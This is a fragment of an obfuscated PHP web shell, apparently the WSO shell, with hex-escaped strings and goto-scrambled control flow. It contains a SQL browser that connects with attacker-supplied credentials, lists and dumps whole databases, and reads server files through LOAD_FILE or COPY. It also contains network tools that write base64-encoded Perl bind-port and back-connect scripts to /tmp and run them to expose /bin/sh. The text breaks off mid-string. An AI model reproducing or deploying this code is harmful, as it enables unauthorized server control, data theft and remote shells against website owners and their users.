$_POST["\x70\x32"] .
"\x22\x2c\x20" .
($_POST["\160\x33"] + 1) .
"\51\47\x3e\116\x65\170\164\40\46\x67\164\73\74\57\141\76";
}
goto rczWG;
IQ9di:
}
goto MvXdD;
EHE8j:
echo "\x3c\x2f\164\145\170\x74\141\x72\x65\x61\76\74\x62\x72\x2f\x3e\x3c\151\x6e\x70\165\164\x20\x74\x79\x70\145\x3d\163\165\142\x6d\x69\x74\40\166\141\x6c\165\145\75\47\x45\170\x65\143\x75\x74\145\x27\76";
goto epF3V;
bDaxO:
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if (!empty($_POST["\163\x71\x6c\137\143\157\165\x6e\164"])) {
$n = $db->fetch(
$db->query(
"\x53\105\114\x45\x43\x54\x20\103\x4f\125\116\x54\x28\52\x29\x20\141\163\40\156\x20\106\x52\x4f\x4d\40" .
$value .
""
)
);
}
$value = htmlspecialchars($value);
echo "\x3c\156\157\x62\162\76\74\x69\156\x70\x75\164\x20\x74\171\x70\x65\75\x27\x63\x68\x65\143\x6b\x62\157\x78\47\x20\156\141\x6d\x65\x3d\47\164\142\154\x5b\135\x27\x20\x76\141\x6c\165\145\75\x27" .
$value .
"\x27\76\x26\156\x62\x73\x70\73\74\141\40\x68\x72\145\x66\x3d\43\x20\x6f\156\x63\x6c\151\x63\x6b\x3d\42\x73\164\50\47" .
$value .
"\47\x2c\61\x29\x22\x3e" .
$value .
"\74\x2f\141\76" .
(empty($_POST["\x73\161\x6c\137\143\x6f\x75\x6e\x74"])
? "\46\x6e\142\x73\160\73"
: "\x20\74\x73\155\x61\x6c\x6c\76\x28{$n["\x6e"]}\x29\x3c\57\x73\155\x61\154\x6c\x3e") .
"\74\x2f\156\x6f\142\x72\x3e\74\x62\162\76";
}
goto M5p5r;
l03yb:
if (
!empty($_POST["\160\x32"]) &&
$_POST["\x70\x31"] != "\x6c\157\x61\x64\146\x69\x6c\x65"
) {
echo htmlspecialchars($_POST["\x70\x32"]);
}
goto EHE8j;
M5p5r:
echo "\x3c\151\156\x70\x75\164\40\164\171\160\x65\x3d\x27\x63\150\x65\143\153\142\x6f\x78\47\40\x6f\156\x63\x6c\x69\143\x6b\75\x27\151\163\x28\51\73\47\x3e\40\74\151\x6e\x70\x75\164\x20\164\171\x70\145\75\x62\165\164\164\157\156\x20\x76\141\154\165\145\x3d\47\x44\165\x6d\x70\47\x20\x6f\x6e\x63\154\x69\143\x6b\x3d\47\x64\157\143\165\155\x65\x6e\x74\56\x73\x66\56\160\62\56\166\141\154\x75\x65\x3d\42\144\157\167\x6e\154\157\x61\144\x22\73\144\157\143\x75\155\145\x6e\164\x2e\163\146\56\x73\x75\x62\x6d\x69\164\50\x29\73\47\x3e\74\142\162\76\x46\151\154\145\x20\x70\x61\164\150\72\x3c\151\156\x70\x75\164\x20\x74\171\x70\145\75\164\145\x78\164\x20\x6e\x61\155\145\x3d\146\x69\x6c\x65\40\166\x61\x6c\x75\x65\x3d\47\x64\165\x6d\160\56\x73\161\154\47\76\x3c\57\164\144\76\x3c\164\x64\40\163\164\x79\154\x65\x3d\x27\142\157\x72\x64\145\x72\55\164\x6f\160\x3a\62\x70\170\40\x73\x6f\154\x69\144\40\x23\x36\x36\66\x3b\x27\76";
goto uEPKu;
QW0Ku:
echo "\x3c\164\x72\76\74\164\x64\40\x77\151\x64\164\x68\75\61\x20\x73\x74\x79\154\x65\x3d\x27\142\x6f\x72\144\x65\x72\x2d\x74\157\160\x3a\62\160\170\40\x73\157\154\x69\144\x20\43\66\66\x36\73\x27\x3e\x3c\163\x70\x61\x6e\76\x54\x61\142\154\x65\163\x3a\x3c\57\163\x70\x61\x6e\x3e\74\142\162\x3e\x3c\x62\162\x3e";
goto ss2k2;
epF3V:
echo "\x3c\x2f\164\x64\76\74\x2f\x74\x72\x3e";
goto DdhHe;
ss2k2:
$tbls_res = $db->listTables();
goto bDaxO;
DdhHe:
}
goto E6Jlf;
E6Jlf:
echo "\x3c\x2f\164\141\x62\154\145\76\74\57\x66\157\x72\x6d\x3e\x3c\x62\162\x2f\x3e";
goto eqSj_;
HfqGV:
if (@$_POST["\x70\61"] == "\154\x6f\141\144\146\x69\x6c\145") {
$file = $db->loadFile($_POST["\160\62"]);
echo "\x3c\x62\162\x2f\x3e\x3c\160\x72\145\x20\x63\154\141\163\x73\75\x6d\154\61\x3e" .
htmlspecialchars($file["\146\x69\x6c\x65"]) .
"\74\x2f\160\x72\x65\76";
}
goto OSIXi;
eqSj_:
if ($_POST["\164\x79\x70\x65"] == "\155\x79\x73\161\154") {
$db->query(
"\123\x45\x4c\105\103\x54\x20\61\40\106\122\x4f\x4d\x20\155\x79\x73\161\154\x2e\x75\163\x65\x72\x20\127\x48\x45\x52\105\40\143\x6f\156\x63\x61\x74\x28\x60\165\163\145\162\x60\x2c\x20\x27\100\47\x2c\40\140\150\157\163\164\x60\51\x20\75\40\x55\x53\x45\x52\50\x29\40\101\116\x44\40\140\106\x69\154\145\x5f\160\162\x69\166\140\x20\75\40\x27\x79\x27"
);
if ($db->fetch()) {
echo "\74\146\x6f\x72\155\x20\x6f\156\x73\x75\x62\155\x69\164\x3d\47\144\56\163\x66\x2e\160\x31\56\x76\x61\x6c\x75\x65\x3d\x22\154\x6f\141\x64\146\151\154\145\x22\x3b\144\157\x63\x75\x6d\x65\156\164\56\163\x66\56\x70\x32\x2e\166\141\x6c\x75\x65\75\164\150\151\x73\x2e\x66\56\166\141\154\165\145\73\144\x6f\143\x75\155\x65\156\164\56\x73\x66\x2e\x73\165\x62\x6d\151\x74\x28\51\x3b\x72\145\x74\165\x72\156\x20\x66\141\x6c\163\x65\x3b\47\x3e\74\163\160\141\x6e\x3e\x4c\157\x61\144\40\146\151\154\145\74\57\x73\x70\x61\x6e\x3e\40\x3c\151\x6e\160\x75\x74\x20\x20\143\x6c\x61\163\x73\75\47\x74\157\157\x6c\x73\x49\x6e\160\47\40\164\171\x70\145\75\x74\145\x78\164\40\156\x61\155\x65\x3d\x66\76\74\151\x6e\x70\165\164\40\x74\171\160\145\75\163\x75\142\155\x69\x74\40\166\141\x6c\165\x65\x3d\x27\x3e\76\47\x3e\x3c\57\146\x6f\x72\155\x3e";
}
}
goto HfqGV;
wQooQ:
echo "\x3c\142\162\x2f\76\74\x74\141\142\154\x65\x20\x77\151\144\x74\150\75\61\x30\x30\x25\40\x63\x65\x6c\x6c\x70\141\x64\x64\151\156\x67\75\62\x20\143\145\x6c\x6c\x73\x70\x61\x63\x69\x6e\x67\x3d\60\x3e";
goto v7m0f;
OSIXi:
} else {
echo htmlspecialchars($db->error());
}
goto qgUXu;
eZaK7:
echo "\xd\12\74\150\61\x3e\x53\x71\154\x20\142\162\157\x77\163\145\162\x3c\57\x68\x31\x3e\x3c\144\151\166\40\143\x6c\141\163\163\75\x63\x6f\156\x74\145\156\164\x3e\15\12\74\x66\x6f\x72\x6d\x20\x6e\x61\155\145\75\47\163\146\x27\x20\155\x65\x74\150\x6f\x64\75\47\160\157\x73\x74\x27\40\x6f\x6e\163\165\x62\x6d\x69\164\75\47\146\163\x28\x74\150\151\163\x29\73\47\76\x3c\164\141\x62\154\145\40\x63\x65\154\x6c\x70\141\x64\144\151\x6e\x67\x3d\47\62\x27\40\143\x65\x6c\154\x73\x70\141\143\151\x6e\x67\x3d\x27\60\47\76\x3c\164\162\x3e\15\12\74\x74\x64\76\x54\171\x70\x65\74\57\164\144\76\x3c\164\144\76\110\157\x73\164\x3c\x2f\164\144\76\x3c\164\144\76\x4c\157\147\x69\x6e\74\57\164\144\x3e\74\x74\x64\76\x50\x61\163\x73\167\x6f\x72\144\74\x2f\164\144\x3e\74\164\x64\76\x44\141\x74\141\142\141\163\145\x3c\57\x74\144\x3e\x3c\164\144\76\74\x2f\164\x64\x3e\x3c\57\x74\x72\x3e\x3c\164\x72\76\xd\xa\x3c\151\156\160\165\164\x20\164\x79\x70\145\x3d\x68\x69\144\144\x65\x6e\x20\156\x61\155\145\75\141\40\x76\x61\x6c\165\145\x3d\123\x71\x6c\x3e\x3c\151\156\x70\165\x74\x20\x74\x79\160\x65\75\150\151\144\144\145\156\x20\156\x61\155\x65\x3d\x70\61\x20\x76\141\154\x75\x65\75\47\x71\165\x65\x72\171\47\76\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\145\x3d\150\151\144\x64\x65\156\x20\156\x61\x6d\x65\75\160\62\40\166\x61\x6c\x75\x65\x3d\47\47\x3e\x3c\151\x6e\160\165\x74\40\x74\171\160\x65\x3d\x68\x69\144\x64\145\156\x20\156\141\155\x65\x3d\x63\40\x76\141\x6c\x75\x65\75\x27" .
htmlspecialchars($GLOBALS["\x63\x77\144"]) .
"\47\x3e\74\x69\156\x70\165\x74\40\164\x79\x70\145\75\150\x69\x64\144\145\156\x20\156\x61\155\145\x3d\143\150\x61\x72\x73\145\164\40\x76\x61\154\x75\145\75\47" .
(isset($_POST["\x63\150\x61\162\163\145\164"])
? $_POST["\x63\x68\141\x72\x73\x65\164"]
: "") .
"\x27\76\xd\xa\x3c\x74\x64\76\74\x73\145\154\x65\x63\x74\40\156\x61\155\x65\x3d\47\x74\171\160\145\47\76\74\x6f\160\164\151\157\156\40\x76\141\154\x75\x65\x3d\47\155\171\x73\161\x6c\47\40";
goto XNXvh;
L_VIT:
if (isset($_POST["\163\x71\x6c\x5f\150\x6f\x73\164"])) {
if (
$db->connect(
$_POST["\x73\161\x6c\137\150\x6f\163\164"],
$_POST["\x73\161\154\137\x6c\157\x67\151\x6e"],
$_POST["\163\161\154\137\x70\x61\x73\x73"],
$_POST["\x73\x71\x6c\x5f\142\141\x73\x65"]
)
) {
goto zzoGT;
zzoGT:
switch ($_POST["\143\150\x61\162\163\145\x74"]) {
case "\x57\151\x6e\144\x6f\x77\x73\55\61\62\65\61":
$db->setCharset("\143\160\x31\x32\x35\x31");
break;
case "\x55\124\x46\55\70":
$db->setCharset("\x75\x74\146\70");
break;
case "\x4b\x4f\111\x38\55\122":
$db->setCharset("\153\157\151\70\162");
break;
case "\x4b\x4f\x49\70\55\x55":
$db->setCharset("\x6b\x6f\151\x38\x75");
break;
case "\143\160\70\x36\66":
$db->setCharset("\143\160\x38\x36\66");
break;
}
goto CgrPi;
hq4SA:
echo "\74\57\x73\x65\x6c\x65\x63\x74\x3e";
goto pJJmI;
CgrPi:
$db->listDbs();
goto KKbSG;
MV0Hw:
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo "\74\157\160\x74\151\157\x6e\x20\166\141\154\x75\145\75\42" .
$value .
"\42\40" .
($value == $_POST["\163\x71\154\x5f\x62\141\163\145"]
? "\x73\x65\154\x65\143\x74\145\144"
: "") .
"\76" .
$value .
"\74\57\157\x70\164\151\x6f\156\76";
}
goto hq4SA;
KKbSG:
echo "\74\163\145\x6c\145\x63\x74\x20\156\141\x6d\x65\75\163\161\x6c\137\x62\x61\163\x65\x3e\x3c\x6f\x70\x74\151\x6f\x6e\40\166\x61\154\165\145\x3d\x27\47\x3e\74\57\157\x70\x74\151\157\156\76";
goto MV0Hw;
pJJmI:
} else {
echo $tmp;
}
} else {
echo $tmp;
}
goto Auorx;
pXyEP:
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case "\x6d\x79\163\161\154":
if (
$this->link = @mysqli_connect(
$host,
$user,
$pass,
$dbname
)
) {
return true;
}
break;
case "\x70\147\x73\x71\154":
goto urMgZ;
NmhxL:
if (
$this->link = @pg_connect(
"\150\x6f\163\164\75{$host[0]}\40\x70\x6f\x72\x74\x3d{$host[1]}\x20\165\x73\x65\x72\75{$user}\x20\x70\x61\163\163\167\x6f\x72\144\75{$pass}\40\x64\x62\x6e\x61\x6d\145\x3d{$dbname}"
)
) {
return true;
}
goto q24c2;
q24c2:
break;
goto pMERe;
urMgZ:
$host = explode("\x3a", $host);
goto dzuNv;
dzuNv:
if (!$host[1]) {
$host[1] = 5432;
}
goto NmhxL;
pMERe:
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case "\155\x79\x73\161\154":
if (@mysqli_select_db($this->link, $db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case "\155\171\163\161\x6c":
return $this->res = @mysqli_query($this->link, $str);
break;
case "\160\147\x73\x71\x6c":
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
goto ndkAm;
Ccrqd:
return false;
goto kFQe3;
ndkAm:
$res = func_num_args() ? func_get_arg(0) : $this->res;
goto uBsjP;
uBsjP:
switch ($this->type) {
case "\x6d\171\x73\161\x6c":
return @mysqli_fetch_assoc($res);
break;
case "\160\x67\163\161\154":
return @pg_fetch_assoc($res);
break;
}
goto Ccrqd;
kFQe3:
}
function listDbs()
{
switch ($this->type) {
case "\155\171\163\161\154":
return $this->query(
"\123\x48\117\x57\x20\144\x61\x74\141\x62\141\x73\145\163"
);
break;
case "\160\x67\x73\161\154":
return $this->res = $this->query(
"\x53\105\x4c\x45\x43\x54\x20\x64\141\164\156\141\x6d\x65\40\106\x52\117\115\x20\160\x67\x5f\x64\141\164\141\142\141\163\145\40\x57\110\x45\x52\x45\x20\144\x61\x74\151\163\164\x65\x6d\x70\x6c\141\x74\x65\41\x3d\x27\164\47"
);
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case "\155\171\163\x71\x6c":
return $this->res = $this->query(
"\x53\x48\117\x57\40\x54\x41\x42\114\x45\x53"
);
break;
case "\x70\x67\163\x71\154":
return $this->res = $this->query(
"\x73\x65\x6c\145\143\x74\x20\x74\141\142\x6c\x65\137\156\141\x6d\145\40\146\x72\157\x6d\x20\151\x6e\x66\157\x72\x6d\141\164\x69\x6f\x6e\x5f\163\x63\x68\x65\155\141\56\164\x61\x62\154\145\x73\x20\x77\150\145\162\x65\40\164\x61\142\x6c\145\x5f\163\143\x68\x65\x6d\141\x20\41\x3d\x20\x27\151\156\146\157\162\x6d\x61\164\x69\x6f\x6e\137\163\143\150\145\x6d\x61\x27\40\101\116\104\40\x74\141\x62\x6c\x65\x5f\x73\143\150\x65\155\x61\x20\x21\75\x20\x27\160\x67\137\x63\141\164\141\x6c\157\x67\47"
);
break;
}
return false;
}
function error()
{
switch ($this->type) {
case "\155\171\163\x71\154":
return @mysqli_error();
break;
case "\x70\147\163\161\154":
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case "\155\171\x73\x71\154":
if (
function_exists(
"\x6d\171\x73\x71\x6c\54\137\163\145\164\x5f\x63\x68\x61\162\163\x65\164"
)
) {
return @mysqli_set_charset($str, $this->link);
} else {
$this->query(
"\123\x45\x54\40\x43\110\101\x52\x53\105\124\40" .
$str
);
}
break;
case "\160\x67\x73\161\x6c":
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case "\155\171\x73\x71\x6c":
return $this->fetch(
$this->query(
"\x53\x45\114\x45\x43\124\40\x4c\x4f\x41\104\137\x46\x49\x4c\x45\x28\47" .
addslashes($str) .
"\47\51\40\141\163\x20\146\x69\154\145"
)
);
break;
case "\160\x67\x73\161\x6c":
goto hIi1_;
hIi1_:
$this->query(
"\103\x52\105\x41\124\x45\40\124\101\x42\114\105\x20\167\163\157\x32\50\146\x69\154\x65\x20\x74\x65\170\164\x29\x3b\x43\x4f\x50\131\x20\x77\x73\157\62\x20\106\122\117\x4d\40\x27" .
addslashes($str) .
"\x27\73\x73\x65\154\145\x63\164\x20\x66\151\x6c\145\x20\146\162\157\155\x20\x77\x73\x6f\x32\x3b"
);
goto Vq5gq;
RFQO1:
return ["\x66\151\154\x65" => implode("\12", $r)];
goto Xccn3;
Vq5gq:
$r = [];
goto B2PD8;
B2PD8:
while ($i = $this->fetch()) {
$r[] = $i["\146\x69\154\145"];
}
goto ytmal;
ytmal:
$this->query(
"\144\162\157\160\x20\x74\x61\x62\154\x65\x20\167\x73\x6f\x32"
);
goto RFQO1;
Xccn3:
break;
goto hza_Y;
hza_Y:
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case "\155\x79\x73\x71\154":
goto A8Rtf;
XOdpv:
$i = 0;
goto nXX1H;
dgmAw:
if (!$head) {
if ($fp) {
fwrite($fp, "\x3b\12\12");
} else {
echo "\73\xa\12";
}
}
goto xuWj3;
nXX1H:
$head = true;
goto rdh_q;
vLJ0E:
$sql = $create[1] . "\73\xa";
goto GZCGH;
e85gZ:
$this->query(
"\123\x45\114\105\103\124\40\x2a\40\x46\122\117\x4d\x20\x60" .
$table .
"\x60"
);
goto XOdpv;
A8Rtf:
$res = $this->query(
"\123\110\117\x57\x20\103\x52\105\x41\x54\105\x20\124\x41\x42\114\105\40\140" .
$table .
"\x60"
);
goto WbvCG;
rdh_q:
while ($item = $this->fetch()) {
$sql = "";
if ($i % 1000 == 0) {
$head = true;
$sql = "\73\xa\xa";
}
$columns = [];
foreach ($item as $k => $v) {
if ($v === null) {
$item[$k] = "\116\x55\x4c\x4c";
} elseif (is_int($v)) {
$item[$k] = $v;
} else {
$item[$k] =
"\47" .
@mysqli_real_escape_string($v) .
"\47";
}
$columns[] = "\140" . $k . "\x60";
}
if ($head) {
$sql .=
"\111\x4e\123\x45\x52\124\x20\x49\116\124\117\x20\x60" .
$table .
"\x60\x20\50" .
implode("\x2c\40", $columns) .
"\51\x20\126\101\114\125\x45\123\40\12\11\50" .
implode("\54\x20", $item) .
"\x29";
$head = false;
} else {
$sql .=
"\xa\11\x2c\x28" .
implode("\x2c\40", $item) .
"\x29";
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
goto dgmAw;
xuWj3:
break;
goto I2Pib;
WbvCG:
$create = mysqli_fetch_array($res);
goto vLJ0E;
GZCGH:
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
goto e85gZ;
I2Pib:
case "\160\x67\x73\x71\x6c":
goto yK1Fh;
q4AGJ:
break;
goto M_aLo;
YU12f:
while ($item = $this->fetch()) {
$columns = [];
foreach ($item as $k => $v) {
$item[$k] = "\47" . addslashes($v) . "\x27";
$columns[] = $k;
}
$sql =
"\x49\116\x53\x45\122\x54\x20\x49\116\x54\x4f\40" .
$table .
"\40\50" .
implode("\54\40", $columns) .
"\51\40\126\x41\x4c\125\105\123\40\50" .
implode("\54\40", $item) .
"\x29\x3b" .
"\12";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
goto q4AGJ;
yK1Fh:
$this->query(
"\123\105\x4c\105\x43\x54\40\x2a\x20\106\x52\x4f\x4d\40" .
$table
);
goto YU12f;
M_aLo:
}
return false;
}
}
goto S2jsy;
nON0D:
wsoHeader();
goto eZaK7;
S2jsy:
$db = new DbClass($_POST["\x74\171\x70\145"]);
goto b5FFe;
xAAjI:
echo "\76\115\171\x53\x71\x6c\x3c\57\x6f\x70\164\x69\157\x6e\76\x3c\157\160\164\151\x6f\x6e\x20\x76\141\154\165\145\x3d\x27\x70\147\163\x71\x6c\47\x20";
goto WqMW0;
b5FFe:
if (@$_POST["\160\62"] == "\x64\157\x77\x6e\x6c\157\x61\144") {
goto q3uCo;
dKSpy:
switch ($_POST["\143\150\141\162\163\145\164"]) {
case "\x57\151\156\x64\x6f\x77\163\55\x31\62\x35\61":
$db->setCharset("\x63\x70\61\x32\x35\x31");
break;
case "\x55\124\106\x2d\x38":
$db->setCharset("\x75\164\146\x38");
break;
case "\113\x4f\111\x38\x2d\122":
$db->setCharset("\153\157\x69\x38\x72");
break;
case "\x4b\x4f\x49\70\x2d\x55":
$db->setCharset("\153\x6f\151\x38\x75");
break;
case "\143\160\x38\66\66":
$db->setCharset("\x63\x70\x38\x36\66");
break;
}
goto SW_1d;
SW_1d:
if (empty($_POST["\x66\x69\154\145"])) {
goto UlEph;
NKAxm:
foreach ($_POST["\164\x62\x6c"] as $v) {
$db->dump($v);
}
goto gTeuJ;
UlEph:
ob_start("\x6f\142\x5f\147\x7a\x68\141\x6e\144\x6c\x65\x72", 4096);
goto wxi0r;
wxi0r:
header(
"\x43\x6f\156\164\x65\x6e\x74\55\104\151\163\x70\157\163\151\164\151\157\x6e\72\x20\141\164\164\141\x63\150\x6d\x65\156\164\73\40\146\151\154\145\x6e\x61\155\145\75\x64\x75\x6d\x70\x2e\x73\x71\x6c"
);
goto JFnky;
gTeuJ:
exit();
goto o3LDH;
JFnky:
header(
"\103\x6f\156\164\x65\x6e\164\55\124\x79\160\x65\x3a\40\x74\145\x78\164\57\160\x6c\x61\151\x6e"
);
goto NKAxm;
o3LDH:
} elseif ($fp = @fopen($_POST["\x66\x69\x6c\x65"], "\167")) {
goto HVjKn;
sI6XB:
fclose($fp);
goto JcIQa;
JcIQa:
unset($_POST["\160\x32"]);
goto eJ6NS;
HVjKn:
foreach ($_POST["\x74\142\x6c"] as $v) {
$db->dump($v, $fp);
}
goto sI6XB;
eJ6NS:
} else {
die(
"\x3c\163\x63\x72\151\x70\x74\x3e\x61\x6c\x65\162\164\50\42\x45\x72\x72\157\x72\41\x20\103\x61\x6e\47\x74\x20\x6f\x70\145\156\40\146\151\x6c\145\x22\51\73\x77\x69\x6e\144\x6f\167\56\x68\x69\x73\x74\x6f\162\171\56\142\141\143\x6b\50\x2d\61\51\74\57\163\x63\162\151\160\x74\76"
);
}
goto V4cuJ;
q3uCo:
$db->connect(
$_POST["\x73\x71\x6c\x5f\x68\157\163\x74"],
$_POST["\163\161\x6c\137\154\x6f\147\151\x6e"],
$_POST["\x73\161\x6c\x5f\x70\x61\163\163"],
$_POST["\163\x71\x6c\x5f\142\x61\x73\145"]
);
goto G1BTq;
G1BTq:
$db->selectdb($_POST["\x73\x71\x6c\x5f\x62\x61\163\x65"]);
goto dKSpy;
V4cuJ:
}
goto nON0D;
XNXvh:
if (@$_POST["\164\x79\x70\145"] == "\155\171\163\161\x6c") {
echo "\163\145\x6c\145\143\164\x65\x64";
}
goto xAAjI;
gsteZ:
}
goto BTyYB;
M9YJl:
$_POST = WSOstripslashes($_POST);
goto ocXfq;
BTyYB:
function actionNetwork()
{
goto ZoVmx;
unkZP:
$bind_port_p =
"\111\x79\105\166\144\x58\116\x79\x4c\x32\112\160\x62\151\x39\167\x5a\130\112\163\104\121\x6f\x6b\125\x30\x68\x46\x54\x45\167\71\x49\151\x39\151\x61\127\64\166\143\62\x67\147\114\127\153\151\x4f\167\x30\x4b\x61\127\131\x67\113\105\102\x42\x55\x6b\x64\127\111\104\x77\x67\x4d\x53\x6b\147\x65\171\102\x6c\x65\x47\154\x30\113\104\x45\160\x4f\171\x42\x39\x44\x51\160\61\143\x32\x55\x67\x55\62\71\152\x61\62\126\x30\x4f\167\x30\x4b\x63\x32\x39\x6a\141\62\x56\x30\113\x46\x4d\x73\112\x6c\102\107\130\x30\x6c\x4f\122\126\x51\163\x4a\x6c\116\x50\x51\60\164\146\x55\61\x52\123\122\125\106\116\x4c\x47\x64\x6c\144\x48\102\x79\x62\x33\122\166\131\x6e\x6c\165\131\x57\61\x6c\113\x43\x64\x30\x59\63\x41\x6e\x4b\x53\x6b\x67\x66\x48\x77\147\x5a\107\x6c\154\x49\103\x4a\x44\x59\127\65\60\111\107\116\x79\x5a\x57\x46\60\132\123\102\x7a\142\x32\x4e\162\x5a\130\x52\x63\142\x69\111\x37\104\x51\x70\172\132\130\x52\172\142\62\116\x72\x62\63\102\x30\x4b\x46\115\163\125\x30\x39\x4d\130\61\116\x50\121\x30\x74\106\126\x43\x78\x54\124\x31\71\x53\122\x56\x56\124\122\x55\x46\x45\x52\x46\111\163\115\123\153\67\x44\x51\160\x69\141\127\x35\153\113\106\115\x73\x63\x32\71\x6a\141\62\x46\153\x5a\110\x4a\x66\x61\127\64\x6f\112\105\106\123\x52\x31\x5a\x62\x4d\106\60\163\x53\125\x35\102\122\105\122\x53\130\x30\106\117\x57\123\x6b\160\111\x48\170\70\111\x47\122\x70\132\x53\101\x69\x51\62\106\x75\x64\103\102\166\x63\x47\x56\x75\111\x48\x42\166\x63\x6e\122\143\142\151\111\x37\x44\x51\x70\x73\141\130\x4e\60\x5a\127\x34\x6f\125\x79\167\172\113\123\x42\70\x66\x43\x42\153\x61\127\125\147\111\x6b\116\150\142\x6e\x51\147\x62\107\154\x7a\x64\x47\126\x75\x49\x48\x42\x76\x63\156\x52\x63\x62\151\111\67\104\121\160\x33\141\x47\154\163\x5a\x53\x67\x78\113\123\x42\67\104\x51\157\x4a\131\127\x4e\152\x5a\130\102\x30\x4b\105\x4e\120\x54\153\64\x73\x55\x79\x6b\x37\x44\121\x6f\112\x61\x57\x59\157\x49\123\x67\153\143\x47\x6c\153\120\127\x5a\x76\x63\x6d\163\x70\x4b\x53\102\x37\x44\x51\x6f\112\x43\x57\x52\160\x5a\123\x41\x69\x51\x32\x46\x75\142\155\71\x30\x49\107\x5a\x76\x63\x6d\163\151\111\107\154\155\x49\103\x67\x68\132\107\126\x6d\x61\x57\65\154\x5a\x43\101\153\143\x47\x6c\153\113\124\163\116\x43\x67\153\x4a\x62\x33\x42\154\142\151\102\124\x56\105\x52\x4a\x54\151\x77\151\x50\x43\132\104\x54\60\x35\117\x49\152\x73\116\103\147\x6b\x4a\142\x33\x42\154\x62\x69\102\x54\126\x45\122\x50\x56\x56\121\x73\x49\152\x34\x6d\x51\60\x39\x4f\124\x69\x49\67\104\x51\x6f\112\x43\x57\x39\167\x5a\x57\64\147\125\x31\x52\105\x52\126\x4a\123\x4c\x43\111\53\x4a\x6b\116\120\124\x6b\x34\x69\117\x77\60\113\103\x51\154\x6c\145\107\x56\x6a\x49\x43\122\124\x53\x45\x56\x4d\x54\x43\102\70\x66\103\102\153\141\127\x55\x67\143\110\112\x70\142\156\121\147\121\60\71\x4f\x54\151\x41\x69\x51\62\x46\x75\144\x43\x42\x6c\x65\x47\126\152\144\x58\122\x6c\x49\103\x52\124\123\x45\126\115\124\106\170\165\111\x6a\163\x4e\103\147\x6b\x4a\x59\x32\x78\166\x63\x32\125\x67\x51\60\71\117\x54\x6a\163\x4e\x43\x67\153\112\x5a\x58\150\160\x64\x43\x41\x77\117\167\60\113\103\x58\x30\116\103\156\60\75";
goto PvgFx;
y9LP4:
if (isset($_POST["\160\x31"])) {
goto oL5si;
oL5si:
function cf($f, $t)
{
($w = @fopen($f, "\167")) or
@function_exists(
"\x66\x69\x6c\145\137\160\165\164\x5f\143\157\156\164\145\x6e\164\x73"
);
if ($w) {
@fwrite($w, @base64_decode($t));
@fclose($w);
}
}
goto O2j7_;
O2j7_:
if ($_POST["\x70\x31"] == "\x62\160\160") {
goto OF3WF;
SvfsQ:
unlink("\x2f\164\155\160\x2f\x62\x70\56\x70\x6c");
goto zB2bw;
l42lD:
sleep(1);
goto YdT1I;
YdT1I:
echo "\x3c\x70\x72\x65\40\143\x6c\141\163\163\x3d\x6d\x6c\61\76{$out}\12" .
wsoEx(
"\160\163\40\141\165\x78\x20\174\x20\x67\162\145\x70\40\x62\x70\56\x70\154"
) .
"\74\57\160\162\145\x3e";
goto SvfsQ;
P3N6B:
$out = wsoEx(
"\x70\145\162\154\x20\57\x74\x6d\x70\x2f\142\x70\x2e\x70\154\x20" .
$_POST["\160\62"] .
"\x20\61\76\57\144\145\x76\57\156\165\154\154\x20\x32\x3e\46\x31\40\46"
);
goto l42lD;
OF3WF:
cf("\57\164\x6d\x70\x2f\x62\160\56\x70\154", $bind_port_p);
goto P3N6B;
zB2bw:
}
goto mmghY;
mmghY:
if ($_POST["\160\61"] == "\142\x63\x70") {
goto KdsjF;
EYep1:
unlink("\57\164\x6d\x70\x2f\142\143\x2e\160\x6c");
goto vnHPj;
cueL2:
sleep(1);
goto rbk8c;
rbk8c:
echo "\x3c\160\x72\x65\40\143\154\141\163\163\x3d\155\x6c\x31\x3e{$out}\12" .
wsoEx(
"\x70\163\40\141\x75\x78\x20\x7c\x20\147\x72\145\160\x20\x62\143\x2e\160\154"
) .
"\74\x2f\160\x72\x65\x3e";
goto EYep1;
KdsjF:
cf("\57\164\x6d\160\57\142\143\x2e\x70\154", $back_connect_p);
goto JIcLb;
JIcLb:
$out = wsoEx(
"\160\x65\x72\x6c\40\57\164\155\160\x2f\142\x63\x2e\160\x6c\x20" .
$_POST["\x70\x32"] .
"\40" .
$_POST["\x70\x33"] .
"\40\61\76\x2f\144\145\x76\57\x6e\x75\x6c\154\x20\62\x3e\x26\x31\x20\x26"
);
goto cueL2;
vnHPj:
}
goto HmOsb;
HmOsb:
}
goto JZOTa;
QtVUX:
wsoFooter();
goto r_ZsG;
ZoVmx:
wsoHeader();
goto ui6gf;
PvgFx:
echo "\x3c\x68\61\x3e\x4e\145\164\x77\157\162\153\40\x74\x6f\x6f\154\163\x3c\x2f\x68\x31\x3e\x3c\144\x69\x76\40\x63\x6c\141\163\163\75\143\157\x6e\x74\145\156\x74\x3e\xd\12\11\x3c\146\x6f\x72\x6d\40\x6e\x61\155\x65\75\47\156\146\x70\47\x20\x6f\156\123\165\x62\155\151\x74\75\42\x67\50\x6e\x75\x6c\154\x2c\x6e\x75\x6c\154\54\47\x62\160\x70\47\x2c\x74\x68\x69\x73\x2e\x70\x6f\162\164\x2e\166\x61\x6c\165\x65\51\73\162\x65\164\x75\x72\x6e\40\146\x61\x6c\163\145\73\x22\76\xd\xa\x9\x3c\163\x70\x61\156\x3e\x42\x69\x6e\144\40\x70\157\x72\164\x20\x74\157\x20\57\x62\151\156\57\163\150\x20\x5b\x70\145\x72\x6c\x5d\x3c\57\163\x70\141\156\76\74\x62\162\x2f\x3e\15\xa\11\x50\157\162\x74\72\x20\x3c\x69\x6e\x70\x75\164\x20\164\171\160\x65\x3d\47\164\x65\170\x74\x27\x20\x6e\141\155\145\x3d\4